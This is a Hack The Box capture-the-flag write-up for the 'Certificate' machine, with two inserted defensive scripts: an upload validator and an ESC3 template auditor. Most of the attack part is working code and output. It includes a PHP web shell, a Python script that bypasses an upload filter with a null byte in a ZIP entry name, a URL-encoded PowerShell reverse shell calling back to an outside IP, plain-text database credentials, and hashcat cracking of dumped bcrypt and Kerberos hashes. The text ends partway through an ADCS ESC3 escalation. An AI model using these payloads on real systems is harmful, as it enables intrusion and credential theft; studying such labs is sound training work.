HTB | Certificate
Machine: https://app.hackthebox.com/machines/Certificate
IP: 10.129.238.3
NMAP
└─$ nmap -sT -p- --min-rate 10000 10.129.238.3 -Pn -oA nmap_ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-01 00:54 IST
Nmap scan report for 10.129.238.3
Host is up (0.31s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49686/tcp open  unknown
49688/tcp open  unknown
49706/tcp open  unknown
60728/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 98.69 seconds
└─$ nmap -sC -sV -p 53,80,88,135,139,445,464,636,3268,5985,9389,49666,49686,49688,49706,60728 10.129.238.3 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-01 00:56 IST
Nmap scan report for 10.129.238.3
Host is up (0.57s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 03:27:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T03:28:50+00:00; +7h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T03:28:52+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
60728/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2025-06-01T03:28:14
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.48 seconds
SMB
The guest account is disabled, and junk accounts return STATUS_LOGON_FAILURE:
└─$ netexec smb 10.129.238.3 -u guest -p ''
SMB         10.129.238.3    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB         10.129.238.3    445    DC01             [-] certificate.htb\guest: STATUS_ACCOUNT_DISABLED
└─$ netexec smb 10.129.238.3 -u anurag -p ''
SMB         10.129.238.3    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB         10.129.238.3    445    DC01             [-] certificate.htb\anurag: STATUS_LOGON_FAILURE
└─$ netexec smb 10.129.238.3 -u anurag -p junk
SMB         10.129.238.3    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB         10.129.238.3    445    DC01             [-] certificate.htb\anurag:junk STATUS_LOGON_FAILURE
Port 80

└─$ whatweb -v -a 3 certificate.htb
WhatWeb report for http://certificate.htb
Status    : 200 OK
Title     : Certificate | Your portal for certification
IP        : 10.129.238.3
Country   : RESERVED, ZZ
Summary   : Apache[2.4.58], Bootstrap, Cookies[PHPSESSID], HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30], HttpOnly[PHPSESSID], JQuery[2.2.4], Meta-Author[colorlib], OpenSSL[3.1.3], PHP[8.0.30], Script[text/javascript], X-Powered-By[PHP/8.0.30]
Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 
        Version      : 2.4.58 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 
        Website     : https://getbootstrap.com/
[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 
        String       : PHPSESSID
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 
[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 
        String       : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 (from server string)
[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie 
        response header and the browser supports it then the cookie 
        cannot be accessed through client side script - More Info: 
        http://en.wikipedia.org/wiki/HTTP_cookie
        String       : PHPSESSID
[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 
        Version      : 2.2.4
        Website     : http://jquery.com/
[ Meta-Author ]
        This plugin retrieves the author name from the meta name 
        tag - info: 
        http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
        #author
        String       : colorlib
[ OpenSSL ]
        The OpenSSL Project is a collaborative effort to develop a 
        robust, commercial-grade, full-featured, and Open Source 
        toolkit implementing the Secure Sockets Layer (SSL v2/v3) 
        and Transport Layer Security (TLS v1) protocols as well as 
        a full-strength general purpose cryptography library. 
        Version      : 3.1.3
        Website     : http://www.openssl.org/
[ PHP ]
        PHP is a widely-used general-purpose scripting language 
        that is especially suited for Web development and can be 
        embedded into HTML. This plugin identifies PHP errors, 
        modules and versions and extracts the local file path and 
        username if present. 
        Version      : 8.0.30
        Version      : 8.0.30
        Google Dorks: (2)
        Website     : http://www.php.net/
[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 
        String       : text/javascript
[ X-Powered-By ]
        X-Powered-By HTTP header 
        String       : PHP/8.0.30 (from x-powered-by string)
HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sun, 01 Jun 2025 03:29:17 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
        X-Powered-By: PHP/8.0.30
        Set-Cookie: PHPSESSID=mkj5ujfmpukvebmbctt27acscq; path=/; HttpOnly
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        Connection: close
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
Let's look for directories and subdirectories:
└─$ dirsearch -u http://certificate.htb/ -x 403,404
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Certificate/reports/http_certificate.htb/__25-06-01_01-00-20.txt
Target: http://certificate.htb/
[01:00:20] Starting:
[01:00:54] 200 -   14KB - /about.php                                        
[01:01:36] 500 -  638B  - /cgi-bin/printenv.pl                              
[01:01:47] 200 -    0B  - /db.php                                           
[01:01:56] 503 -  404B  - /examples/jsp/index.html                          
[01:01:56] 503 -  404B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[01:01:56] 503 -  404B  - /examples/
[01:01:56] 503 -  404B  - /examples
[01:01:56] 503 -  404B  - /examples/servlet/SnoopServlet                    
[01:01:56] 503 -  404B  - /examples/jsp/snp/snoop.jsp                       
[01:01:56] 503 -  404B  - /examples/servlets/index.html
[01:01:56] 503 -  404B  - /examples/servlets/servlet/CookieExample
[01:01:56] 503 -  404B  - /examples/servlets/servlet/RequestHeaderExample
[01:01:56] 503 -  404B  - /examples/websocket/index.xhtml                   
[01:01:59] 200 -    3KB - /footer.php                                       
[01:02:03] 200 -    2KB - /header.php                                       
[01:02:16] 200 -    9KB - /login.php                                        
[01:02:17] 302 -    0B  - /logout.php  ->  login.php                        
[01:02:44] 200 -   11KB - /register.php                                     
[01:02:57] 301 -  343B  - /static  ->  http://certificate.htb/static/
[01:02:57] 301 -  345B  - /static..  ->  http://certificate.htb/static../
[01:03:08] 302 -    0B  - /upload.php  ->  login.php                        
                                                                             
Task Completed
We can log in as a student.
Foothold/shell
/uploads
We found “No quizz found with the given SID.” on /uploads

Found upload functionality.

Uploading a normal text file gives the following error:

We can upload a PDF and view it.


When trying to upload and view a .doc file, it gets downloaded instead.

Since we can upload a zip file, we can try to upload a shell.php with a null byte in its name (a possible bypass) inside a zip.
I tried manually but had no luck, so we will use the exploit.py below.
└─$ cat shell.php                 
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
└─$ cat exploit.py
import zipfile

# Paths
zip_path = 'shell.zip'
new_zip_path = 'shell2.zip'
old_filename = 'shell.php'
# Embedded NUL: an ends-with check sees ".pdf", while a C-style path API
# stops reading the name at the NUL and sees "shell.php".
new_filename = 'shell.php\x00.pdf'

# Open the original ZIP and create a new one
with zipfile.ZipFile(zip_path, 'r') as zip_read:
    with zipfile.ZipFile(new_zip_path, 'w') as zip_write:
        for item in zip_read.infolist():
            original_data = zip_read.read(item.filename)
            # Rename the target file by setting ZipInfo.filename directly;
            # ZipInfo() would truncate a NUL-containing name on construction.
            if item.filename == old_filename:
                item.filename = new_filename
            zip_write.writestr(item, original_data)

print(f'Renamed {old_filename} to {new_filename} inside {new_zip_path}')
└─$ zip shell.zip shell.php       
  adding: shell.php (deflated 25%)
└─$ python3 exploit.py
Renamed shell.php to shell.php.pdf inside shell2.zip
Now we will upload the shell2.zip and visit the file with /shell.php?cmd=whoami

And we can execute commands.
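A defender's counterpart to the trick above, added here as an example (it is not code from the writeup or from the target web application): a ZIP upload validator that reads entry names straight from the archive's central directory, so an embedded NUL or a traversal component cannot hide behind a trailing ".pdf". The allow-list and the "naive" ends-with check are assumptions about how an upload handler might be written; the archive it vets is constructed inline, with the NUL-in-name entry built the same way exploit.py builds it.

```python
import io
import struct
import zipfile

# Constructed allow-list for this example; the real site's rules are unknown.
ALLOWED_EXTENSIONS = {b".pdf", b".docx", b".txt"}
EOCD_SIG = b"PK\x05\x06"   # end-of-central-directory signature
CDH_SIG = b"PK\x01\x02"    # central-directory file-header signature


def raw_entry_names(data: bytes) -> list:
    """Return every entry name exactly as stored in the ZIP central directory.

    Python's zipfile.ZipInfo truncates names at the first NUL, so a check that
    trusts namelist() sees 'shell.php' where a libzip-based extractor sees the
    full 'shell.php\\x00.pdf'. Reading the bytes ourselves closes that gap.
    """
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD layout: total entries (u16) at +10, directory size (u32) at +12,
    # directory offset (u32) at +16
    entries, _cd_size, cd_offset = struct.unpack("<HII", data[eocd + 10:eocd + 20])
    names, pos = [], cd_offset
    for _ in range(entries):
        if data[pos:pos + 4] != CDH_SIG:
            raise ValueError("corrupt central directory")
        # name / extra / comment lengths sit at +28, +30, +32 of the 46-byte header
        name_len, extra_len, comment_len = struct.unpack("<HHH", data[pos + 28:pos + 34])
        names.append(data[pos + 46:pos + 46 + name_len])
        pos += 46 + name_len + extra_len + comment_len
    return names


def stdlib_entry_names(data: bytes) -> list:
    """What the standard library reports for the same archive (NULs truncated)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def naive_is_allowed(name: bytes) -> bool:
    """Assumed weak check: does the name merely *end* with an allowed extension?"""
    return any(name.lower().endswith(ext) for ext in ALLOWED_EXTENSIONS)


def hardened_is_allowed(name: bytes) -> bool:
    """Reject control bytes (NUL included), directory components and anything
    other than an ASCII stem plus exactly one allow-listed extension."""
    if not name or not name.isascii():
        return False
    if any(b < 0x20 or b == 0x7F for b in name):
        return False
    if b"/" in name or b"\\" in name or b":" in name:
        return False
    stem, dot, ext = name.rpartition(b".")
    if not dot or not stem or b"." in stem:
        return False
    return b"." + ext.lower() in ALLOWED_EXTENSIONS


def vet_upload(data: bytes) -> dict:
    """Map each raw entry name (latin-1 decoded so a NUL stays visible) to the
    pair (naive_verdict, hardened_verdict)."""
    return {n.decode("latin-1"): (naive_is_allowed(n), hardened_is_allowed(n))
            for n in raw_entry_names(data)}


def build_sample_zip() -> bytes:
    """Constructed archive: a benign PDF, a NUL-in-name entry (ZipInfo.filename
    set after construction, as exploit.py does) and a path-traversal name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4\n% constructed sample\n")
        tricky = zipfile.ZipInfo("placeholder")
        tricky.filename = "shell.php\x00.pdf"
        zf.writestr(tricky, b"<?php /* constructed placeholder, not a working shell */ ?>")
        zf.writestr("../escape.pdf", b"constructed")
    return buf.getvalue()


if __name__ == "__main__":
    for name, (weak, strong) in vet_upload(build_sample_zip()).items():
        print(f"{name!r:28} naive={weak!s:5} hardened={strong}")
```

The point of reading the central directory by hand is that the validator must see the same bytes the extracting library will act on; a check built on the standard library's namelist() would report the second entry as "shell.php" and might even reject it for the wrong reason, while a server using a different ZIP implementation would see the full name and apply its own extension logic to it.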
Let's try to get a reverse shell:
<http://certificate.htb/static/uploads/8ad6b1453a685cd6a629959dcfb5039d/shell.php?cmd=powershell%20-NoP%20-NonI%20-W%20Hidden%20-Command%20%22$client%20%3D%20New-Object%20System.Net.Sockets.TCPClient('10.10.16.23'%2C1234)%3B$stream%20%3D%20$client.GetStream()%3B[byte[]>]$bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile(($i%20%3D%20$stream.Read($bytes%2C%200%2C%20$bytes.Length))%20-ne%200)%7B%3B$data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes%2C0%2C%20$i)%3B$sendback%20%3D%20(iex%20$data%202%3E%261%20%7C%20Out-String%20)%3B$sendback2%20%20%3D%20$sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B$sendbyte%20%3D%20([text.encoding]::ASCII).GetBytes($sendback2)%3B$stream.Write($sendbyte%2C0%2C$sendbyte.Length)%3B$stream.Flush()%7D%22
Found passwords.txt:
PS C:\xampp> type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
   User: root
   Password:
   (means no password!)
2) FileZilla FTP:
   [ You have to create a new user on the FileZilla Interface ] 
3) Mercury (not in the USB & lite version): 
   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)
   User: newuser  
   Password: wampp 
4) WEBDAV: 
   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).     
PS C:\xampp>
Found WebDAV credentials:
PS C:\xampp\webdav> type webdav.txt
WEB-DAV f?r den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente ?ber den Apache2.
Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: <http://localhost/webdav/>
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben. 
Lokales Directory: /xampp/webdav/
PS C:\xampp\webdav>
DB
We found db.php:
PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = '<PASSWORD>'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
PS C:\xampp\htdocs\certificate.htb>
Since we know XAMPP is installed, let's use mysql.exe in C:\xampp\mysql\bin and take a look at the database.
PS C:\xampp\mysql\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SELECT DATABASE();"
DATABASE()
certificate_webapp_db
PS C:\xampp\mysql\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SHOW TABLES;"
Tables_in_certificate_webapp_db
course_sessions
courses
users
users_courses
PS C:\xampp\mysql\bin>
We found hashes for the users:
PS C:\xampp\mysql\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SELECT * from users;"
id      first_name      last_name       username        email   password        created_at      role    is_active
1       Lorra   Armessa Lorra.AAA       lorra.aaa@certificate.htb       $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG    2024-12-23 12:43:10     teacher 1
6       Sara    Laracrof        Sara1200        sara1200@gmail.com      $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK    2024-12-23 12:47:11     teacher 1
7       John    Wood    Johney  johny009@mail.com       $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq    2024-12-23 13:18:18     student 1
8       Havok   Watterson       havokww havokww@hotmail.com     $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti    2024-12-24 09:08:04     teacher 1
9       Steven  Roman   stev    steven@yahoo.com        $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2    2024-12-24 12:05:05     student 1
10      Sara    Brawn   sara.b  sara.b@certificate.htb  $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6    2024-12-25 21:31:26     admin   1
12      test    test    test    test@gmail.com  $2y$04$5r9/BJYyYLz3UoFUmxG1.ujjbWTcSVKE6Q/UvOQTJsBEt84C6HkZW    2025-06-01 07:00:09     student 1
PS C:\xampp\mysql\bin>
Cracking passwords
Let's try to crack these passwords with hashcat:
└─$ hashcat -m 3200 hashes.txt /home/anurag/stuff/rockyou.txt --username
<--SNIP-->
$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
<--SNIP-->
Shell as Sara.B
And we are in as Sara.B.

We found a pcap file:
    Directory: C:\Users\Sara.B\Documents\WS-01
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/4/2024  12:44 AM            530 Description.txt
-a----        11/4/2024  12:45 AM         296660 WS-01_PktMon.pcap
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> cat Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01>
Shell as Lion.SK
WS-01_PktMon.pcap
On analysing the protocols in the capture, we can see:

Let's look at Kerberos.
We found what looks like a valid packet:

We can refer to this
In our case, the encryption mode (etype) is eTYPE-AES256-CTS-HMAC-SHA1-96 (18), which is the same as the vscrub
The cname and realm are in req-body: Lion.sk and CERTIFICATE.HTB, respectively.
We get the following hash:
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0
We will use hashcat to crack the hash:
└─$ hashcat lion.hash /home/anurag/stuff/rockyou.txt
<--SNIP-->
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0:!QAZ2wsx
<--SNIP-->
Let's WinRM in with the credentials.
And we are in.

Found user.txt:
    Directory: C:\Users\Lion.SK\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/1/2025   2:45 AM             34 user.txt
Privilege Escalation
Bloodhound
└─$ bloodhound-python -u Lion.SK -p '!QAZ2wsx' -d Certificate.htb -ns 10.129.93.221 -c All --zip
According to the description of the Domain CRA Managers group:
The members of this security group are responsible for issuing and revoking multiple certificates for the domain users
ESC3
Let's look for vulnerable templates:
└─$ certipy find -u Lion.SK -p '!QAZ2wsx' -target 10.129.93.221 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 18 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'Certificate-LTD-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'Certificate-LTD-CA'
[*] Checking web enrollment for CA 'Certificate-LTD-CA' @ 'DC01.certificate.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : Certificate-LTD-CA
    DNS Name                            : DC01.certificate.htb
    Certificate Subject                 : CN=Certificate-LTD-CA, DC=certificate, DC=htb
    Certificate Serial Number           : 75B2F4BBF31F108945147B466131BDCA
    Certificate Validity Start          : 2024-11-03 22:55:09+00:00
    Certificate Validity End            : 2034-11-03 23:05:09+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFICATE.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        ManageCertificates              : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Enroll                          : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-05T19:52:09+00:00
    Template Last Modified              : 2024-11-05T19:52:10+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFICATE.HTB\Administrator
        Full Control Principals         : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.
We can refer to this for ESC3.
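For the defensive side of the finding above, here is an added example (the editor's, not Certipy's own code and not part of the writeup) that parses the text layout Certipy prints and audits it for the ESC3 precondition: an enabled template carrying the Certificate Request Agent EKU, enrollable by principals outside a trusted set, with neither manager approval nor an extra authorized signature required. The trusted-principal set and the constructed sample output (which mirrors the layout shown above and adds two made-up templates, "User" and "AgentApproved", for contrast) are assumptions.

```python
import re

# Principals that may legitimately hold enrollment-agent rights (assumption for this audit).
TRUSTED_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrators"}

INDEX_LINE = re.compile(r"^\s{1,3}\d+$")     # "  0", "  1": start of a template block
LABEL_PREFIX = re.compile(r"^\[[+!-]\]\s*")  # strips "[+] " / "[!] " markers from keys


def parse_templates(text: str) -> list:
    """Parse the 'Certificate Templates' section of `certipy find -text` output
    into one {key: [values]} dict per template. Deeply indented lines without a
    colon continue the previous key, so multi-valued fields keep every entry."""
    templates, current, last_key, in_section = [], None, None, False
    for line in text.splitlines():
        if line.startswith("Certificate Templates"):
            in_section = True
            continue
        if not in_section:
            continue
        if INDEX_LINE.match(line):
            current, last_key = {}, None
            templates.append(current)
            continue
        if current is None or not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if ":" in line:
            key, _, value = line.partition(":")
            key = LABEL_PREFIX.sub("", key.strip())
            current[key] = [value.strip()] if value.strip() else []
            last_key = key
        elif indent >= 12 and last_key:
            current[last_key].append(line.strip())
        else:  # bare section header such as "Permissions"
            last_key = None
    return templates


def _first(template: dict, key: str, default: str) -> str:
    values = template.get(key)
    return values[0] if values else default


def esc3_candidates(templates: list, trusted=TRUSTED_PRINCIPALS) -> list:
    """Return (template name, untrusted enrollers) for templates that hand the
    Certificate Request Agent EKU to principals outside `trusted` without any
    approval gate."""
    findings = []
    for t in templates:
        if _first(t, "Enabled", "False") != "True":
            continue
        is_agent = (_first(t, "Enrollment Agent", "False") == "True"
                    or "Certificate Request Agent" in t.get("Extended Key Usage", []))
        if not is_agent or _first(t, "Requires Manager Approval", "False") == "True":
            continue
        if _first(t, "Authorized Signatures Required", "0") != "0":
            continue
        enrollers = [p.split("\\", 1)[-1] for p in t.get("Enrollment Rights", [])]
        untrusted = [p for p in enrollers if p not in trusted]
        if untrusted:
            findings.append((_first(t, "Template Name", "?"), untrusted))
    return findings


def audit(text: str) -> list:
    return esc3_candidates(parse_templates(text))


# Constructed sample in Certipy's layout (first template mirrors the writeup's output).
SAMPLE_CERTIPY_OUTPUT = r"""Certificate Authorities
  0
    CA Name                             : Certificate-LTD-CA
Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Enabled                             : True
    Enrollment Agent                    : True
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Template Created                    : 2024-11-05T19:52:09+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.
  1
    Template Name                       : User
    Enabled                             : True
    Enrollment Agent                    : False
    Extended Key Usage                  : Client Authentication
                                          Secure Email
    Requires Manager Approval           : False
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain Users
  2
    Template Name                       : AgentApproved
    Enabled                             : True
    Enrollment Agent                    : True
    Requires Manager Approval           : True
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain Admins
"""

if __name__ == "__main__":
    for name, who in audit(SAMPLE_CERTIPY_OUTPUT):
        print(f"ESC3 candidate: {name} enrollable by {', '.join(who)}")
```

Run against real output, the same check is what a periodic AD CS review would script: the fix for a hit is either removing the wide enrollment right, requiring manager approval on the agent template, or constraining which templates the agent may sign for through the CA's enrollment agent restrictions.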
Shell as Ryan.K
Exploitation with Certipy
The exploitation process involves obtaining an Enrollment Agent certificate and then using it to request a certificate for a privileged user, which is then used for authentication.
Step 1: Obtain an Enrollment Agent certificate. The attacker (lion.sk@certificate.htb) enrolls for a certificate from the misconfigured enrollment-agent template (here, Delegated-CRA).
